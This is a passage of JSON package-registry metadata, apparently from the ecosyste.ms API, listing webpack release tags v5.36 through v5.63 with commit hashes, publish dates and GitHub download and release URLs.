nload_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack